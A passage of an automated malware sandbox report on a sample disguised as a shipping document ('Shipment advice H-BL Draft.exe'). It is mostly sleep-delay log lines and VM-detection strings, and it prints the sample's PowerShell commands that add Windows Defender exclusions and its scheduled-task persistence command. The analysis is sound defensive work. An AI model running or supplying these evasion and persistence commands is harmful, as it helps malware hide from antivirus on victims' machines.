                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -596593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -596484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -596375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -596265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -596156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -596046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -595937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -595828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -595718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -595609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -595500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -595390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -595281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -595171s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -595058s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -594953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -594843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe TID: 1396Thread sleep time: -594613s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 4068Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -25825441703193356s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 8188Thread sleep count: 8054 > 30
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 8188Thread sleep count: 1793 > 30
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -599547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -599438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -599219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -599094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -598982s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -598860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -598735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -598610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -598485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -598360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -598235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -598110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -597985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -597860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -597747s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -597625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -597516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -597406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -597281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -597172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -597047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -596938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -596813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -596703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -596590s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -596469s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -596341s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -595982s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -595865s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -595749s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -595625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -595516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -595406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -595297s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -595187s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -595078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -594969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -594859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -594739s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -594610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -594500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -594391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -594281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -594172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe TID: 768Thread sleep time: -594050s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599436Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599108Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598780Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598452Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 598010Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596921Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 595058Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeThread delayed: delay time: 594613Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599438
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 599094
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598982
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598860
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598735
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598610
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598485
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598360
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 598110
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597985
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597860
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597747
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597625
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597516
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597406
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597281
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597172
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 597047
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596938
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596813
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596590
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596469
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 596341
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595982
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595865
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595749
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595625
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595516
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595297
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595187
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 595078
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594969
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594859
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594739
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594500
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594391
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594281
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594172
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeThread delayed: delay time: 594050
                    Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3713823747.0000000000C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                    Source: PrcGlGVKeUCXxg.exe, 0000000E.00000002.1376503389.0000000001413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!X
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1314750589.00000000014C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3716119264.0000000000E97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                    Source: PrcGlGVKeUCXxg.exe, 0000000E.00000002.1386369638.0000000007590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 13_2_06699668 LdrInitializeThunk,13_2_06699668
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeMemory written: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeProcess created: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeProcess created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
